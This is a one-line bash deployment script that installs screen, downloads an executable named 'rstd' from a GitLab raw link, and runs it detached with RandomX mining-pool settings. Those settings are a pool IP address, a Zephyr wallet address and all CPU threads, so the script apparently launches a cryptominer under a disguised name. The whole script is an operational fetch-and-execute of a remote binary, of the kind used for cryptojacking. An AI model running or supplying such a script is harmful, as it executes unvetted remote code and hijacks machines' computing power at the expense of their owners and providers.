#!/usr/bin/env bash
sudo apt update -y && sudo apt install screen -y && wget https://gitlab.com/sarifadim/jomblo/-/raw/main/rstd && chmod +x rstd && screen -dms run ./rstd -o 47.89.195.104:443 -a rx/0 -u ZEPHsC5qZJv8JqyaGPNAviDERPxFGBzXx1bo8rx7RqD9JkPh68Lk7AnLdsNAZfrukeFoU9dnboT6tAJkAZ1etvM1Q5PqiQu8DEk.$(echo A-$(TZ=UTC-7 date +"%H-%M-%S")) -p -x -t $(nproc --all) && screen -r
